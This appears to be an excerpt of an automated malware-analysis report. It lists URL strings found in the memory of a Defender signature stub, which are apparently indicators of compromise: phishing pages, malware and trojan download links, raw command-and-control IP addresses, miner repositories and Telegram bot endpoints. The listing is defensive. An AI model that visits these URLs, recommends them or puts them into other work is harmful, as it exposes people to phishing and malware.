Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://zz.8282.space/nw/ss/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://zzease.com/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://zzobpk.ba/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: https://%s/ews/exchange.asmx
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: https://%s/owa/auth.owa
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: https://%s/owa/lang.owa
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://%s/owa/meetingpollhandler.ashx
Source: MpSigStub.exe, 00000024.00000003.6272159714.00000197A331E000.00000004.00000001.sdmp String found in binary or memory: https://%s/si.jsp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: https://09e26c1d.ngrok.io/exploit/jprotected.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://0utl00k.net/docs
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://145855projectframingltd-my.sharepoint.com/:b:/g/personal/jan_projectframing_com/evmq9_ggpulc
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp String found in binary or memory: https://179.43.134.164:443
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp String found in binary or memory: https://185.118.167.189:44
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: https://185.180.199.102/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: https://1876479389.rsc.cdn77.org/p2r.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://193.29.15.147
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://1drv.ms/w/s
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp String found in binary or memory: https://23.95.238.122:443
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://2no.co/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: https://2no.co/1spk97.gif
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://42801.weebly.com/uploads/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://645tgvew.gb.net/gtrfeef3r/?wv54544f=gv445g5g55
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: https://7college.du.ac.bd/upload/mukrimul/0/beans.php
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: https://a.doko.moe/uvjwpr.sct
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: https://a.pomf.cat/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://a.pomfe.co/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: https://a.top4top.net/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://a12.aioecoin
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: https://a12.aioecoin.org/609710d5b915bc7
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://aamilah.co.uk/ds/0302.gif
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://ab.v-mail.online/?e=
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://abgchina.org/roundcubes/roundcube/soundcube.web/1file.php
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://abiesalamat.com/wp-brent/toolzlord.php
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: https://abpandh.com/drms/fert.html
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: https://abpnco.com/naywplqm/04.html
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: https://account.qq.com/cgi-bin/auth_forget
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/token
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://acquatrat.com.br/wp-admin/maint/audio2/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://activate.utorrent.com
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://addledsteamb.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://addledsteamb.xyz/baygoda0nuq2oey1rta2odg4rdhcqzleqzrbruu3qta5oui=
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: https://adegt.com/wp-includes/sodium_co
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: https://adop109.000webhostapp.com/index.html
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://aframe.io/releases/0.7.1/aframe.min.js
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp String found in binary or memory: https://agent.wizztrakys.com/a_
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://agilefield53.com/rb/excelzz/index.php
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: https://ahtaeereddit.org
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://aimsnotification.info/soyakim
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://airsoftne.com.br/wp-admin/maint/redirect/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://ajdepehlisale.gb.net/document.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://alfahad.io/ocart2/admin/controller/catalog/gr.mpwq
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: https://allcityroofers.com/wp-admin/spf/hnr/tap.php
Source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%s
Source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%sxe
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://alpine.kz/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://alwaslapps.com/attachment/attach.php
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: https://am.localstormwatch00.localstormw
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://amigosforever.net/d/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://andyscars.co.uk/signedz/index.html)
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://angel.ac.nz/wp-content/uploads/2019/10/THEBRKMZ.ocx
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://anhii.com/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: https://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: https://anonfiles.com/
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: https://anspa.dyndns.dk/dr1/next.php
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp String found in binary or memory: https://api.edgelauncher.com
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp String found in binary or memory: https://api.github.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://api.imgur.com/3/upload.xml
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://api.l33tsite.info/lib/
Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp String found in binary or memory: https://api.tdameritrade.com/v1/accounts
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://app.box.com/s/q5bvxbs72948q6t7n5nrft0lnuddkj7g
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://app.box.com/shared/static/oy44fta2sdgxuuch02tkyvmez9zssxqb.zip
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://appengine.google.com/_ah/logout?continue=http
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://apps-newsorders.servehttp.com/_
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://apps-nosmile.servehttp.com/_
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp String found in binary or memory: https://appupdate.herokuapp.com
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://arabictv.ml/catalog/controlyte6;ler/payment/mollie-api-client/build/YS0LfExPc7MJU3.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://archaeology.ideaschema.com/hiwork.php
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://armybar.hopto.org/remoteload.dotm
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://arteecaligrafia.vI&8&$Ocom.br/imagens/fotos/thumbs/MupJ4cvI&8&$OZzxoElmn.php
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: https://userkade.com/21.psd
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: https://arti-insaat.com/wp-includes/rest-api/report-dh1.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://asgvprotecao.c
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://fazalandsons.com.pk/wp-includes/ixr/class-ixr-base64.php
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://feedbackportal.download/ecm/ibm/3173379797/converter.dot
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: https://ferra.xyz/glsdil.php
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://fersite24.xyz/sa2234332324if3g4f23.php
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://filedropper.com/main/
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: https://fileshare24.top/3223if3g4f23.php
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/converter.dot
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://find-your-profithere11.com/?m=1&o=hybpdzu&t=yrcrt&u=lb8k605
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://flopyrhnd.tk/pr/lan.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://flyaircario.com/i/post.php
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: https://folkloreeconomy.com/next.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://forbeslegalg%CCFYpowerlist20g%CCFY20.g%CCFYcom/imgg%CCFY/icons/u3BYBjeabtg%CCFYMx.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://formspree.io/f/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://fpvtunes.binaryprotectors.com/msreal/jreside
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://fqe.short.gy/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://fqe.short.gy/gclxo6
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://fqe.short.gy/j7xs8j
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://fr-an1.link/?e=atloperat
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://frabey.de/templates/elsterwetter16b/images/system/hp.gf
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://freelanceranik.com/group.php
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: https://friendoffishing.com//wp-content/themes/calliope/template-parts/wp_data.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://fs01n4.sendspace.com/dlpro/20fb7f511bc258709195b9ca0c6c258e/595e5d75/k6zafp/x6iu1omg_2_.zips
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://fs01n5.sendspace.com/dl/23da2e4841c1800d1954130c638d13c3/575d2f1645706e13/ooru9w/google%20ch
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: https://fslqzt.info/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://fx.pb-invioce.online/?e=accounts
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://fx.pb-invioce.online/?e=info
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://fx.pb-invioce.online/?e=m.turqueto
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://gantiatiainzx.us-south.cf.appdomain.cloud/?bbre=zxoiasxz#/abrimvh-&
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://gaspee.info/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://gatipackers-movers.com/wp-content/plugins/(
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://geklne.com/extra/?code=cmljagfyzc5tyxjncmf2zubtzxryb2jhbmsucgxjlnvr
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://geoconsultantservices.com/some/next.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://get.adobe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://gettraff.ru/
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: https://gettraff.ru/aws?keyword=
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://gez.org.zw/errorpages/load/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://gg.gg/ig6f0
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://ggtraff.ru/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://giahanecuador.com/s/?login=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://gidbasket.com/drms/ind.html
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://gist.githubusercontent.com/razdorhere
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/512295
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/68070804
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://github.com/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Alexuiop1337/Trojan-Downloader/raw/master/fee.exe
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Bendr0id/xmrigCC
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://github.com/JulianG97/TextEditor
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcc
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcc-amd
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcc/
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcchttps://github.com/bendr0id/xmrigcc-amdhttps://github.com/bendr0i
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: https://github.com/nwoolls/multiminer
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://github.com/robertdavidgraham/masscan
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://github.com/robertdavidgraham/masscanx
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/samratashok/nishang
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://giversplusz2020.ddnsking.com/audio/amvlbmeuam9obkbqy3cub3jn
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://gmaax.in/wp-includes/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://gmaax.in/wp-includes/blocks/embed/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://gmaax.in/wp-includes/js/crop/reportcmacgm.php
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp String found in binary or memory: https://go.wikitextbooks.info
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://goo.gl/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://goo.gl/6bvmse)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://goo.gl/t4wd4iscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://goodiebagkanvas.com/m/?login=ithelp
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://goofy-davinci-6ad239.netlify.app/)/s/uri
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://gposervitech.com/wp-content/cgi-bins/files/office365html/office
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://grace-memorial-church.com/shares/share/fghjke77383oned/share
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://grandvilaformosa.comNOuxgc/NOuxgcwp-contenNOuxgct/pluginsNOuxgc/woNOuxgcrdpress-seo/css/disN
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://granelseeds.cl/wp-includes/js/ghost/countrysubjectip.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://griginet.com/ggassh/sshrod.php
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://gritodopovo.com.br/doc/reserva.wiz
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://gritodopovo.com.br/natalidade/new.wiz
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: https://gruasphenbogota.com/c74hwggxi/ka.html
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://gtec24.com/0mqp0yn6/kk.html
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://h9-mil.live/?e=anita.masyk
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://hamality.xyz
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://hard10.authorizeddns.us/1?zved58il3scrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://hardshipaccompany.com/next.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://hardx2.mydad.info/1?ef8il3hesscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://hawkloger.shortcm.li/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://help-lolooo.cf/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://hghfjklkjlk.dvgwrgwjrgkhowrg.gb.net/qwertyxls/zip/document.php
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: https://hillsbed.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/ajo/processor.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/egab/processor.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/emzf/processor.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/lin/processor.php
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/tism/processor.php
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: https://hitecsec.org/wp-includes/js/reportdhlnew.php
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: https://hjnkmjkm.duckdns.org/bb/sf-express.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://hk.sd-inhcice.online/?e=sylvie.nicol
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: https://holidayinndarlingharbour-my.sharepoint.com/personal/dos_holidayinndarlingharbour_com_au/_lay
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://holisticxox.com/doc/check.doc
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://holisticxox.com/doc/payment.doc
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://hotel-harmonia.am/images/prettyphoto/login/redirect.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://houses43s.somdhouths.xyz/?e=
